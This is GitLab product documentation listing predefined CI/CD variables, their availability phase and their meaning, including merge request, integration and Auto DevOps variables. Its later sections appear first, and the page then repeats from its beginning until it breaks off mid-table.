`CI_REGISTRY_IMAGE` | Pre-pipeline | Base address for the container registry to push, pull, or tag project's images, formatted as `<host>[:<port>]/<project_full_path>`. For example: `registry.gitlab.example.com/my_group/my_project`. Image names must follow the [container registry naming convention](../../user/packages/container_registry/_index.md#naming-convention-for-your-container-images). Only available if the container registry is enabled for the project. | | `CI_REGISTRY_PASSWORD` | Job-only | The password to push containers to the GitLab project's container registry. Only available if the container registry is enabled for the project. This password value is the same as the `CI_JOB_TOKEN` and is valid only as long as the job is running. Use the `CI_DEPLOY_PASSWORD` for long-lived access to the registry | | `CI_REGISTRY_USER` | Job-only | The username to push containers to the project's GitLab container registry. Only available if the container registry is enabled for the project. | | `CI_RELEASE_DESCRIPTION` | Pipeline | The description of the release. Available only on pipelines for tags. Description length is limited to first 1024 characters. Introduced in GitLab 15.5. | | `CI_REPOSITORY_URL` | Job-only | The full path to Git clone (HTTP) the repository with a [CI/CD job token](../jobs/ci_job_token.md), in the format `https://gitlab-ci-token:$CI_JOB_TOKEN@gitlab.example.com/my-group/my-project.git`. | | `CI_RUNNER_DESCRIPTION` | Job-only | The description of the runner. | | `CI_RUNNER_EXECUTABLE_ARCH` | Job-only | The OS/architecture of the GitLab Runner executable. Might not be the same as the environment of the executor. | | `CI_RUNNER_ID` | Job-only | The unique ID of the runner being used. | | `CI_RUNNER_REVISION` | Job-only | The revision of the runner running the job. | | `CI_RUNNER_SHORT_TOKEN` | Job-only | The runner's unique ID, used to authenticate new job requests. The token contains a prefix, and the first 17 characters are used. | | `CI_RUNNER_TAGS` | Job-only | A JSON array of runner tags. For example `["tag_1", "tag_2"]`. | | `CI_RUNNER_VERSION` | Job-only | The version of the GitLab Runner running the job. | | `CI_SERVER_FQDN` | Pre-pipeline | The fully qualified domain name (FQDN) of the instance. For example `gitlab.example.com:8080`. Introduced in GitLab 16.10. | | `CI_SERVER_HOST` | Pre-pipeline | The host of the GitLab instance URL, without protocol or port. For example `gitlab.example.com`. | | `CI_SERVER_NAME` | Pre-pipeline | The name of CI/CD server that coordinates jobs. | | `CI_SERVER_PORT` | Pre-pipeline | The port of the GitLab instance URL, without host or protocol. For example `8080`. | | `CI_SERVER_PROTOCOL` | Pre-pipeline | The protocol of the GitLab instance URL, without host or port. For example `https`. | | `CI_SERVER_SHELL_SSH_HOST` | Pre-pipeline | The SSH host of the GitLab instance, used for access to Git repositories through SSH. For example `gitlab.com`. Introduced in GitLab 15.11. | | `CI_SERVER_SHELL_SSH_PORT` | Pre-pipeline | The SSH port of the GitLab instance, used for access to Git repositories through SSH. For example `22`. Introduced in GitLab 15.11. | | `CI_SERVER_REVISION` | Pre-pipeline | GitLab revision that schedules jobs. | | `CI_SERVER_TLS_CA_FILE` | Pipeline | File containing the TLS CA certificate to verify the GitLab server when `tls-ca-file` set in [runner settings](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section). | | `CI_SERVER_TLS_CERT_FILE` | Pipeline | File containing the TLS certificate to verify the GitLab server when `tls-cert-file` set in [runner settings](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section). | | `CI_SERVER_TLS_KEY_FILE` | Pipeline | File containing the TLS key to verify the GitLab server when `tls-key-file` set in [runner settings](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section). | | `CI_SERVER_URL` | Pre-pipeline | The base URL of the GitLab instance, including protocol and port. For example `https://gitlab.example.com:8080`. | | `CI_SERVER_VERSION_MAJOR` | Pre-pipeline | The major version of the GitLab instance. For example, if the GitLab version is `17.2.1`, the `CI_SERVER_VERSION_MAJOR` is `17`. | | `CI_SERVER_VERSION_MINOR` | Pre-pipeline | The minor version of the GitLab instance. For example, if the GitLab version is `17.2.1`, the `CI_SERVER_VERSION_MINOR` is `2`. | | `CI_SERVER_VERSION_PATCH` | Pre-pipeline | The patch version of the GitLab instance. For example, if the GitLab version is `17.2.1`, the `CI_SERVER_VERSION_PATCH` is `1`. | | `CI_SERVER_VERSION` | Pre-pipeline | The full version of the GitLab instance. | | `CI_SERVER` | Job-only | Available for all jobs executed in CI/CD. `yes` when available. | | `CI_SHARED_ENVIRONMENT` | Pipeline | Only available if the job is executed in a shared environment (something that is persisted across CI/CD invocations, like the `shell` or `ssh` executor). `true` when available. | | `CI_TEMPLATE_REGISTRY_HOST` | Pre-pipeline | The host of the registry used by CI/CD templates. Defaults to `registry.gitlab.com`. Introduced in GitLab 15.3. | | `CI_TRIGGER_SHORT_TOKEN` | Job-only | First 4 characters of the [trigger token](../triggers/_index.md#create-a-pipeline-trigger-token) of the current job. Only available if the pipeline was [triggered with a trigger token](../triggers/_index.md). For example, for a trigger token of `glptt-1234567890abcdefghij`, `CI_TRIGGER_SHORT_TOKEN` would be `1234`. Introduced in GitLab 17.0. <!-- gitleaks:allow --> | | `GITLAB_CI` | Pre-pipeline | Available for all jobs executed in CI/CD. `true` when available. | | `GITLAB_FEATURES` | Pre-pipeline | The comma-separated list of licensed features available for the GitLab instance and license. | | `GITLAB_USER_EMAIL` | Pipeline | The email of the user who started the pipeline, unless the job is a manual job. In manual jobs, the value is the email of the user who started the job. | | `GITLAB_USER_ID` | Pipeline | The numeric ID of the user who started the pipeline, unless the job is a manual job. In manual jobs, the value is the ID of the user who started the job. | | `GITLAB_USER_LOGIN` | Pipeline | The unique username of the user who started the pipeline, unless the job is a manual job. In manual jobs, the value is the username of the user who started the job. | | `GITLAB_USER_NAME` | Pipeline | The display name (user-defined **Full name** in the profile settings) of the user who started the pipeline, unless the job is a manual job. In manual jobs, the value is the name of the user who started the job. | | `KUBECONFIG` | Pipeline | The path to the `kubeconfig` file with contexts for every shared agent connection. Only available when a [GitLab agent for Kubernetes is authorized to access the project](../../user/clusters/agent/ci_cd_workflow.md#authorize-agent-access). | | `TRIGGER_PAYLOAD` | Pipeline | The webhook payload. Only available when a pipeline is [triggered with a webhook](../triggers/_index.md#access-webhook-payload). | ## Predefined variables for merge request pipelines These variables are available before GitLab creates the pipeline (Pre-pipeline). These variables can be used with [`include:rules`](../yaml/includes.md#use-rules-with-include) and as environment variables in jobs. The pipeline must be a [merge request pipeline](../pipelines/merge_request_pipelines.md), and the merge request must be open. | Variable | Description | |---------------------------------------------|-------------| | `CI_MERGE_REQUEST_APPROVED` | Approval status of the merge request. `true` when [merge request approvals](../../user/project/merge_requests/approvals/_index.md) is available and the merge request has been approved. | | `CI_MERGE_REQUEST_ASSIGNEES` | Comma-separated list of usernames of assignees for the merge request. Only available if the merge request has at least one assignee. | | `CI_MERGE_REQUEST_DIFF_BASE_SHA` | The base SHA of the merge request diff. | | `CI_MERGE_REQUEST_DIFF_ID` | The version of the merge request diff. | | `CI_MERGE_REQUEST_EVENT_TYPE` | The event type of the merge request. Can be `detached`, `merged_result` or `merge_train`. | | `CI_MERGE_REQUEST_DESCRIPTION` | The description of the merge request. If the description is more than 2700 characters long, only the first 2700 characters are stored in the variable. Introduced in GitLab 16.7. | | `CI_MERGE_REQUEST_DESCRIPTION_IS_TRUNCATED` | `true` if `CI_MERGE_REQUEST_DESCRIPTION` is truncated down to 2700 characters because the description of the merge request is too long, otherwise `false`. Introduced in GitLab 16.8. | | `CI_MERGE_REQUEST_ID` | The instance-level ID of the merge request. The ID is unique across all projects on the GitLab instance. | | `CI_MERGE_REQUEST_IID` | The project-level IID (internal ID) of the merge request. This ID is unique for the current project, and is the number used in the merge request URL, page title, and other visible locations. | | `CI_MERGE_REQUEST_LABELS` | Comma-separated label names of the merge request. Only available if the merge request has at least one label. | | `CI_MERGE_REQUEST_MILESTONE` | The milestone title of the merge request. Only available if the merge request has a milestone set. | | `CI_MERGE_REQUEST_PROJECT_ID` | The ID of the project of the merge request. | | `CI_MERGE_REQUEST_PROJECT_PATH` | The path of the project of the merge request. For example `namespace/awesome-project`. | | `CI_MERGE_REQUEST_PROJECT_URL` | The URL of the project of the merge request. For example, `http://192.168.10.15:3000/namespace/awesome-project`. | | `CI_MERGE_REQUEST_REF_PATH` | The ref path of the merge request. For example, `refs/merge-requests/1/head`. | | `CI_MERGE_REQUEST_SOURCE_BRANCH_NAME` | The source branch name of the merge request. | | `CI_MERGE_REQUEST_SOURCE_BRANCH_PROTECTED` | `true` when the source branch of the merge request is [protected](../../user/project/repository/branches/protected.md). Introduced in GitLab 16.4. | | `CI_MERGE_REQUEST_SOURCE_BRANCH_SHA` | The HEAD SHA of the source branch of the merge request. The variable is empty in merge request pipelines. The SHA is present only in [merged results pipelines](../pipelines/merged_results_pipelines.md). | | `CI_MERGE_REQUEST_SOURCE_PROJECT_ID` | The ID of the source project of the merge request. | | `CI_MERGE_REQUEST_SOURCE_PROJECT_PATH` | The path of the source project of the merge request. | | `CI_MERGE_REQUEST_SOURCE_PROJECT_URL` | The URL of the source project of the merge request. | | `CI_MERGE_REQUEST_SQUASH_ON_MERGE` | `true` when the [squash on merge](../../user/project/merge_requests/squash_and_merge.md) option is set. Introduced in GitLab 16.4. | | `CI_MERGE_REQUEST_TARGET_BRANCH_NAME` | The target branch name of the merge request. | | `CI_MERGE_REQUEST_TARGET_BRANCH_PROTECTED` | `true` when the target branch of the merge request is [protected](../../user/project/repository/branches/protected.md). Introduced in GitLab 15.2. | | `CI_MERGE_REQUEST_TARGET_BRANCH_SHA` | The HEAD SHA of the target branch of the merge request. The variable is empty in merge request pipelines. The SHA is present only in [merged results pipelines](../pipelines/merged_results_pipelines.md). | | `CI_MERGE_REQUEST_TITLE` | The title of the merge request. | | `CI_MERGE_REQUEST_DRAFT` | `true` if the merge request is a draft. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/275981) in GitLab 17.10. | ## Predefined variables for external pull request pipelines These variables are only available when: - The pipelines are [external pull requests pipelines](../ci_cd_for_external_repos/_index.md#pipelines-for-external-pull-requests) - The pull request is open. | Variable | Description | |-----------------------------------------------|-------------| | `CI_EXTERNAL_PULL_REQUEST_IID` | Pull request ID from GitHub. | | `CI_EXTERNAL_PULL_REQUEST_SOURCE_REPOSITORY` | The source repository name of the pull request. | | `CI_EXTERNAL_PULL_REQUEST_TARGET_REPOSITORY` | The target repository name of the pull request. | | `CI_EXTERNAL_PULL_REQUEST_SOURCE_BRANCH_NAME` | The source branch name of the pull request. | | `CI_EXTERNAL_PULL_REQUEST_SOURCE_BRANCH_SHA` | The HEAD SHA of the source branch of the pull request. | | `CI_EXTERNAL_PULL_REQUEST_TARGET_BRANCH_NAME` | The target branch name of the pull request. | | `CI_EXTERNAL_PULL_REQUEST_TARGET_BRANCH_SHA` | The HEAD SHA of the target branch of the pull request. | ## Deployment variables Integrations that are responsible for deployment configuration can define their own predefined variables that are set in the build environment. These variables are only defined for [deployment jobs](../environments/_index.md). For example, the [Kubernetes integration](../../user/project/clusters/deploy_to_cluster.md#deployment-variables) defines deployment variables that you can use with the integration. The [documentation for each integration](../../user/project/integrations/_index.md) explains if the integration has any deployment variables available. ## Auto DevOps variables When [Auto DevOps](../../topics/autodevops/_index.md) is enabled, some additional [pre-pipeline](#variable-availability) variables are made available: - `AUTO_DEVOPS_EXPLICITLY_ENABLED`: Has a value of `1` to indicate Auto DevOps is enabled. - `STAGING_ENABLED`: See [Auto DevOps deployment strategy](../../topics/autodevops/requirements.md#auto-devops-deployment-strategy). - `INCREMENTAL_ROLLOUT_MODE`: See [Auto DevOps deployment strategy](../../topics/autodevops/requirements.md#auto-devops-deployment-strategy). - `INCREMENTAL_ROLLOUT_ENABLED`: Deprecated. ## Integration variables Some integrations make variables available in jobs. These variables are available as [job-only predefined variables](#variable-availability): - [Harbor](../../user/project/integrations/harbor.md): - `HARBOR_URL` - `HARBOR_HOST` - `HARBOR_OCI` - `HARBOR_PROJECT` - `HARBOR_USERNAME` - `HARBOR_PASSWORD` - [Apple App Store Connect](../../user/project/integrations/apple_app_store.md): - `APP_STORE_CONNECT_API_KEY_ISSUER_ID` - `APP_STORE_CONNECT_API_KEY_KEY_ID` - `APP_STORE_CONNECT_API_KEY_KEY` - `APP_STORE_CONNECT_API_KEY_IS_KEY_CONTENT_BASE64` - [Google Play](../../user/project/integrations/google_play.md): - `SUPPLY_PACKAGE_NAME` - `SUPPLY_JSON_KEY_DATA` - [Diffblue Cover](../../integration/diffblue_cover.md): - `DIFFBLUE_LICENSE_KEY` - `DIFFBLUE_ACCESS_TOKEN_NAME` - `DIFFBLUE_ACCESS_TOKEN` ## Troubleshooting You can [output the values of all variables available for a job](variables_troubleshooting.md#list-all-variables) with a `script` command.
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Predefined CI/CD variables reference breadcrumbs: - doc - ci - variables --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Predefined [CI/CD variables](_index.md) are available in every GitLab CI/CD pipeline. Avoid [overriding](_index.md#use-pipeline-variables) predefined variables, as it can cause the pipeline to behave unexpectedly. ## Variable availability Predefined variables become available at three different phases of pipeline execution: - Pre-pipeline: Pre-pipeline variables are available before the pipeline is created. These variables are the only variables that can be used with [`include:rules`](../yaml/_index.md#includerules) to control which configuration files to use when creating the pipeline. - Pipeline: Pipeline variables become available when GitLab is creating the pipeline. Along with pre-pipeline variables, pipeline variables can be used to configure [`rules`](../yaml/_index.md#rules) defined in jobs, to determine which jobs to add to the pipeline. - Job-only: These variables are only made available to each job when a runner picks up the job and runs it, and: - Can be used in job scripts. - Cannot be used with [trigger jobs](../pipelines/downstream_pipelines.md#trigger-a-downstream-pipeline-from-a-job-in-the-gitlab-ciyml-file). - Cannot be used with [`workflow`](../yaml/_index.md#workflow), [`include`](../yaml/_index.md#include) or [`rules`](../yaml/_index.md#rules). ## Predefined variables | Variable | Availability | Description | |-------------------------------------------------|--------------|-------------| | `CHAT_CHANNEL` | Pipeline | The Source chat channel that triggered the [ChatOps](../chatops/_index.md) command. | | `CHAT_INPUT` | Pipeline | The additional arguments passed with the [ChatOps](../chatops/_index.md) command. | | `CHAT_USER_ID` | Pipeline | The chat service's user ID of the user who triggered the [ChatOps](../chatops/_index.md) command. | | `CI` | Pre-pipeline | Available for all jobs executed in CI/CD. `true` when available. | | `CI_API_V4_URL` | Pre-pipeline | The GitLab API v4 root URL. | | `CI_API_GRAPHQL_URL` | Pre-pipeline | The GitLab API GraphQL root URL. Introduced in GitLab 15.11. | | `CI_BUILDS_DIR` | Job-only | The top-level directory where builds are executed. | | `CI_COMMIT_AUTHOR` | Pre-pipeline | The author of the commit in `Name <email>` format. | | `CI_COMMIT_BEFORE_SHA` | Pre-pipeline | The previous latest commit present on a branch or tag. Is always `0000000000000000000000000000000000000000` for merge request pipelines, scheduled pipelines, the first commit in pipelines for branches or tags, or when manually running a pipeline. | | `CI_COMMIT_BRANCH` | Pre-pipeline | The commit branch name. Available in branch pipelines, including pipelines for the default branch. Not available in merge request pipelines or tag pipelines. | | `CI_COMMIT_DESCRIPTION` | Pre-pipeline | The description of the commit. If the title is shorter than 100 characters, the message without the first line. | | `CI_COMMIT_MESSAGE` | Pre-pipeline | The full commit message. | | `CI_COMMIT_REF_NAME` | Pre-pipeline | The branch or tag name for which project is built. | | `CI_COMMIT_REF_PROTECTED` | Pre-pipeline | `true` if the job is running for a protected reference, `false` otherwise. | | `CI_COMMIT_REF_SLUG` | Pre-pipeline | `CI_COMMIT_REF_NAME` in lowercase, shortened to 63 bytes, and with everything except `0-9` and `a-z` replaced with `-`. No leading / trailing `-`. Use in URLs, host names and domain names. | | `CI_COMMIT_SHA` | Pre-pipeline | The commit revision the project is built for. | | `CI_COMMIT_SHORT_SHA` | Pre-pipeline | The first eight characters of `CI_COMMIT_SHA`. | | `CI_COMMIT_TAG` | Pre-pipeline | The commit tag name. Available only in pipelines for tags. | | `CI_COMMIT_TAG_MESSAGE` | Pre-pipeline | The commit tag message. Available only in pipelines for tags. Introduced in GitLab 15.5. | | `CI_COMMIT_TIMESTAMP` | Pre-pipeline | The timestamp of the commit in the [ISO 8601](https://www.rfc-editor.org/rfc/rfc3339#appendix-A) format. For example, `2022-01-31T16:47:55Z`. [UTC by default](../../administration/timezone.md). | | `CI_COMMIT_TITLE` | Pre-pipeline | The title of the commit. The full first line of the message. | | `CI_CONCURRENT_ID` | Job-only | The unique ID of build execution in a single executor. | | `CI_CONCURRENT_PROJECT_ID` | Job-only | The unique ID of build execution in a single executor and project. | | `CI_CONFIG_PATH` | Pre-pipeline | The path to the CI/CD configuration file. Defaults to `.gitlab-ci.yml`. | | `CI_DEBUG_TRACE` | Pipeline | `true` if [debug logging (tracing)](variables_troubleshooting.md#enable-debug-logging) is enabled. | | `CI_DEBUG_SERVICES` | Pipeline | `true` if [service container logging](../services/_index.md#capturing-service-container-logs) is enabled. Introduced in GitLab 15.7. Requires GitLab Runner 15.7. | | `CI_DEFAULT_BRANCH` | Pre-pipeline | The name of the project's default branch. | | `CI_DEFAULT_BRANCH_SLUG` | Pre-pipeline | `CI_DEFAULT_BRANCH` in lowercase, shortened to 63 bytes, and with everything except `0-9` and `a-z` replaced with `-`. No leading / trailing `-`. Use in URLs, host names and domain names. | | `CI_DEPENDENCY_PROXY_DIRECT_GROUP_IMAGE_PREFIX` | Pre-pipeline | The direct group image prefix for pulling images through the Dependency Proxy. | | `CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX` | Pre-pipeline | The top-level group image prefix for pulling images through the Dependency Proxy. | | `CI_DEPENDENCY_PROXY_PASSWORD` | Pipeline | The password to pull images through the Dependency Proxy. | | `CI_DEPENDENCY_PROXY_SERVER` | Pre-pipeline | The server for logging in to the Dependency Proxy. This variable is equivalent to `$CI_SERVER_HOST:$CI_SERVER_PORT`. | | `CI_DEPENDENCY_PROXY_USER` | Pipeline | The username to pull images through the Dependency Proxy. | | `CI_DEPLOY_FREEZE` | Pre-pipeline | Only available if the pipeline runs during a [deploy freeze window](../../user/project/releases/_index.md#prevent-unintentional-releases-by-setting-a-deploy-freeze). `true` when available. | | `CI_DEPLOY_PASSWORD` | Job-only | The authentication password of the [GitLab Deploy Token](../../user/project/deploy_tokens/_index.md#gitlab-deploy-token), if the project has one. | | `CI_DEPLOY_USER` | Job-only | The authentication username of the [GitLab Deploy Token](../../user/project/deploy_tokens/_index.md#gitlab-deploy-token), if the project has one. | | `CI_DISPOSABLE_ENVIRONMENT` | Pipeline | Only available if the job is executed in a disposable environment (something that is created only for this job and disposed of/destroyed after the execution - all executors except `shell` and `ssh`). `true` when available. | | `CI_ENVIRONMENT_ID` | Pipeline | The ID of the environment for this job. Available if [`environment:name`](../yaml/_index.md#environmentname) is set. | | `CI_ENVIRONMENT_NAME` | Pipeline | The name of the environment for this job. Available if [`environment:name`](../yaml/_index.md#environmentname) is set. | | `CI_ENVIRONMENT_SLUG` | Pipeline | The simplified version of the environment name, suitable for inclusion in DNS, URLs, Kubernetes labels, and so on. Available if [`environment:name`](../yaml/_index.md#environmentname) is set. The slug is [truncated to 24 characters](https://gitlab.com/gitlab-org/gitlab/-/issues/20941). A random suffix is automatically added to [uppercase environment names](https://gitlab.com/gitlab-org/gitlab/-/issues/415526). | | `CI_ENVIRONMENT_URL` | Pipeline | The URL of the environment for this job. Available if [`environment:url`](../yaml/_index.md#environmenturl) is set. | | `CI_ENVIRONMENT_ACTION` | Pipeline | The action annotation specified for this job's environment. Available if [`environment:action`](../yaml/_index.md#environmentaction) is set. Can be `start`, `prepare`, or `stop`. | | `CI_ENVIRONMENT_TIER` | Pipeline | The [deployment tier of the environment](../environments/_index.md#deployment-tier-of-environments) for this job. | | `CI_GITLAB_FIPS_MODE` | Pre-pipeline | Only available if [FIPS mode](../../development/fips_gitlab.md) is enabled in the GitLab instance. `true` when available. | | `CI_HAS_OPEN_REQUIREMENTS` | Pipeline | Only available if the pipeline's project has an open [requirement](../../user/project/requirements/_index.md). `true` when available. | | `CI_JOB_GROUP_NAME` | Pipeline | The shared name of a group of jobs, when using either [`parallel`](../yaml/_index.md#parallel) or [manually grouped jobs](../jobs/_index.md#group-similar-jobs-together-in-pipeline-views). For example, if the job name is `rspec:test: [ruby, ubuntu]`, the `CI_JOB_GROUP_NAME` is `rspec:test`. It is the same as `CI_JOB_NAME` otherwise. Introduced in GitLab 17.10. | | `CI_JOB_ID` | Job-only | The internal ID of the job, unique across all jobs in the GitLab instance. | | `CI_JOB_IMAGE` | Pipeline | The name of the Docker image running the job. | | `CI_JOB_MANUAL` | Pipeline | Only available if the job was started manually. `true` when available. | | `CI_JOB_NAME` | Pipeline | The name of the job. | | `CI_JOB_NAME_SLUG` | Pipeline | `CI_JOB_NAME` in lowercase, shortened to 63 bytes, and with everything except `0-9` and `a-z` replaced with `-`. No leading / trailing `-`. Use in paths. Introduced in GitLab 15.4. | | `CI_JOB_STAGE` | Pipeline | The name of the job's stage. | | `CI_JOB_STATUS` | Job-only | The status of the job as each runner stage is executed. Use with [`after_script`](../yaml/_index.md#after_script). Can be `success`, `failed`, or `canceled`. | | `CI_JOB_TIMEOUT` | Job-only | The job timeout, in seconds. Introduced in GitLab 15.7. Requires GitLab Runner 15.7. | | `CI_JOB_TOKEN` | Job-only | A token to authenticate with [certain API endpoints](../jobs/ci_job_token.md). The token is valid as long as the job is running. | | `CI_JOB_URL` | Job-only | The job details URL. | | `CI_JOB_STARTED_AT` | Job-only | The date and time when a job started, in [ISO 8601](https://www.rfc-editor.org/rfc/rfc3339#appendix-A) format. For example, `2022-01-31T16:47:55Z`. [UTC by default](../../administration/timezone.md). | | `CI_KUBERNETES_ACTIVE` | Pre-pipeline | Only available if the pipeline has a Kubernetes cluster available for deployments. `true` when available. | | `CI_NODE_INDEX` | Pipeline | The index of the job in the job set. Only available if the job uses [`parallel`](../yaml/_index.md#parallel). | | `CI_NODE_TOTAL` | Pipeline | The total number of instances of this job running in parallel. Set to `1` if the job does not use [`parallel`](../yaml/_index.md#parallel). | | `CI_OPEN_MERGE_REQUESTS` | Pre-pipeline | A comma-separated list of up to four merge requests that use the current branch and project as the merge request source. Only available in branch and merge request pipelines if the branch has an associated merge request. For example, `gitlab-org/gitlab!333,gitlab-org/gitlab-foss!11`. | | `CI_PAGES_DOMAIN` | Pre-pipeline | The instance's domain that hosts GitLab Pages, not including the namespace subdomain. To use the full hostname, use `CI_PAGES_HOSTNAME` instead. | | `CI_PAGES_HOSTNAME` | Job-only | The full hostname of the Pages deployment. | | `CI_PAGES_URL` | Job-only | The URL for a GitLab Pages site. Always a subdomain of `CI_PAGES_DOMAIN`. In GitLab 17.9 and later, the value includes the `path_prefix` when one is specified. | | `CI_PIPELINE_ID` | Job-only | The instance-level ID of the current pipeline. This ID is unique across all projects on the GitLab instance. | | `CI_PIPELINE_IID` | Pipeline | The project-level IID (internal ID) of the current pipeline. This ID is unique only in the current project. | | `CI_PIPELINE_SOURCE` | Pre-pipeline | How the pipeline was triggered. The value can be one of the [pipeline sources](../jobs/job_rules.md#ci_pipeline_source-predefined-variable). | | `CI_PIPELINE_TRIGGERED` | Pipeline | `true` if the job was [triggered](../triggers/_index.md). | | `CI_PIPELINE_URL` | Job-only | The URL for the pipeline details. | | `CI_PIPELINE_CREATED_AT` | Job-only | The date and time when the pipeline was created, in [ISO 8601](https://www.rfc-editor.org/rfc/rfc3339#appendix-A) format. For example, `2022-01-31T16:47:55Z`. [UTC by default](../../administration/timezone.md). | | `CI_PIPELINE_NAME` | Pre-pipeline | The pipeline name defined in [`workflow:name`](../yaml/_index.md#workflowname). Introduced in GitLab 16.3. | | `CI_PIPELINE_SCHEDULE_DESCRIPTION` | Pre-pipeline | The description of the pipeline schedule. Only available in scheduled pipelines. Introduced in GitLab 17.8. | | `CI_PROJECT_DIR` | Job-only | The full path the repository is cloned to, and where the job runs from. If the GitLab Runner `builds_dir` parameter is set, this variable is set relative to the value of `builds_dir`. For more information, see the [Advanced GitLab Runner configuration](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section). | | `CI_PROJECT_ID` | Pre-pipeline | The ID of the current project. This ID is unique across all projects on the GitLab instance. | | `CI_PROJECT_NAME` | Pre-pipeline | The name of the directory for the project. For example if the project URL is `gitlab.example.com/group-name/project-1`, `CI_PROJECT_NAME` is `project-1`. | | `CI_PROJECT_NAMESPACE` | Pre-pipeline | The project namespace (username or group name) of the job. | | `CI_PROJECT_NAMESPACE_ID` | Pre-pipeline | The project namespace ID of the job. Introduced in GitLab 15.7. | | `CI_PROJECT_NAMESPACE_SLUG` | Pre-pipeline | `$CI_PROJECT_NAMESPACE` in lowercase with characters that are not `a-z` or `0-9` replaced with - and shortened to 63 bytes. | | `CI_PROJECT_PATH_SLUG` | Pre-pipeline | `$CI_PROJECT_PATH` in lowercase with characters that are not `a-z` or `0-9` replaced with `-` and shortened to 63 bytes. Use in URLs and domain names. | | `CI_PROJECT_PATH` | Pre-pipeline | The project namespace with the project name included. | | `CI_PROJECT_REPOSITORY_LANGUAGES` | Pre-pipeline | A comma-separated, lowercase list of the languages used in the repository. For example `ruby,javascript,html,css`. The maximum number of languages is limited to 5. An issue [proposes to increase the limit](https://gitlab.com/gitlab-org/gitlab/-/issues/368925). | | `CI_PROJECT_ROOT_NAMESPACE` | Pre-pipeline | The root project namespace (username or group name) of the job. For example, if `CI_PROJECT_NAMESPACE` is `root-group/child-group/grandchild-group`, `CI_PROJECT_ROOT_NAMESPACE` is `root-group`. | | `CI_PROJECT_TITLE` | Pre-pipeline | The human-readable project name as displayed in the GitLab web interface. | | `CI_PROJECT_DESCRIPTION` | Pre-pipeline | The project description as displayed in the GitLab web interface. Introduced in GitLab 15.1. | | `CI_PROJECT_TOPICS` | Pre-pipeline | A comma-separated, lowercase list of [topics](../../user/project/project_topics.md) (limited to the first 20) assigned to the project. Introduced in GitLab 18.3 | | `CI_PROJECT_URL` | Pre-pipeline | The HTTP(S) address of the project. | | `CI_PROJECT_VISIBILITY` | Pre-pipeline | The project visibility. Can be `internal`, `private`, or `public`. | | `CI_PROJECT_CLASSIFICATION_LABEL` | Pre-pipeline | The project [external authorization classification label](../../administration/settings/external_authorization.md). | | `CI_REGISTRY` | Pre-pipeline | Address of the [container registry](../../user/packages/container_registry/_index.md) server, formatted as `<host>[:<port>]`. For example: `registry.gitlab.example.com`. Only available if the container registry is enabled for the GitLab instance. | | `CI_REGISTRY_IMAGE` | Pre-pipeline | Base address for the container registry to push, pull, or tag project's images, formatted as `<host>[:<port>]/<project_full_path>`. For example: `registry.gitlab.example.com/my_group/my_project`. Image names must follow the [container registry naming convention](../../user/packages/container_registry/_index.md#naming-convention-for-your-container-images). Only available if the container registry is enabled for the project. | | `CI_REGISTRY_PASSWORD` | Job-only | The password to push containers to the GitLab project's container registry. Only available if the container registry is enabled for the project. This password value is the same as the `CI_JOB_TOKEN` and is valid only as long as the job is running. Use the `CI_DEPLOY_PASSWORD` for long-lived access to the registry | | `CI_REGISTRY_USER` | Job-only | The username to push containers to the project's GitLab container registry. Only available if the container registry is enabled for the project. | | `CI_RELEASE_DESCRIPTION` | Pipeline | The description of the release. Available only on pipelines for tags. Description length is limited to first 1024 characters. Introduced in GitLab 15.5. | | `CI_REPOSITORY_URL` | Job-only | The full path to Git clone (HTTP) the repository with a [CI/CD job token](../jobs/ci_job_token.md), in the format `https://gitlab-ci-token:$CI_JOB_TOKEN@gitlab.example.com/my-group/my-project.git`. | | `CI_RUNNER_DESCRIPTION` | Job-only | The description of the runner. | | `CI_RUNNER_EXECUTABLE_ARCH` | Job-only | The OS/architecture of the GitLab Runner executable. Might not be the same as the environment of the executor. | | `CI_RUNNER_ID` | Job-only | The unique ID of the runner being used. | | `CI_RUNNER_REVISION` | Job-only | The revision of the runner running the job. | | `CI_RUNNER_SHORT_TOKEN` | Job-only | The runner's unique ID, used to authenticate new job requests. The token contains a prefix, and the first 17 characters are used. | | `CI_RUNNER_TAGS` | Job-only | A JSON array of runner tags. For example `["tag_1", "tag_2"]`. | | `CI_RUNNER_VERSION` | Job-only | The version of the GitLab Runner running the job. | | `CI_SERVER_FQDN` | Pre-pipeline | The fully qualified domain name (FQDN) of the instance. For example `gitlab.example.com:8080`. Introduced in GitLab 16.10. | | `CI_SERVER_HOST` | Pre-pipeline | The host of the GitLab instance URL, without protocol or port. For example `gitlab.example.com`. | | `CI_SERVER_NAME` | Pre-pipeline | The name of CI/CD server that coordinates jobs. | | `CI_SERVER_PORT` | Pre-pipeline | The port of the GitLab instance URL, without host or protocol. For example `8080`. | | `CI_SERVER_PROTOCOL` | Pre-pipeline | The protocol of the GitLab instance URL, without host or port. For example `https`. | | `CI_SERVER_SHELL_SSH_HOST` | Pre-pipeline | The SSH host of the GitLab instance, used for access to Git repositories through SSH. For example `gitlab.com`. Introduced in GitLab 15.11. | | `CI_SERVER_SHELL_SSH_PORT` | Pre-pipeline | The SSH port of the GitLab instance, used for access to Git repositories through SSH. For example `22`. Introduced in GitLab 15.11. | | `CI_SERVER_REVISION` | Pre-pipeline | GitLab revision that schedules jobs. | | `CI_SERVER_TLS_CA_FILE` | Pipeline | File containing the TLS CA certificate to verify the GitLab server when `tls-ca-file` set in [runner settings](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section). | | `CI_SERVER_TLS_CERT_FILE` | Pipeline | File containing the TLS certificate to verify the GitLab server when `tls-cert-file` set in [runner settings](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section). | | `CI_SERVER_TLS_KEY_FILE` | Pipeline | File containing the TLS key to verify the GitLab server when `tls-key-file` set in [runner settings](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section). | | `CI_SERVER_URL` | Pre-pipeline | The base URL of the GitLab instance, including protocol and port. For example `https://gitlab.example.com:8080`. | | `CI_SERVER_VERSION_MAJOR` | Pre-pipeline 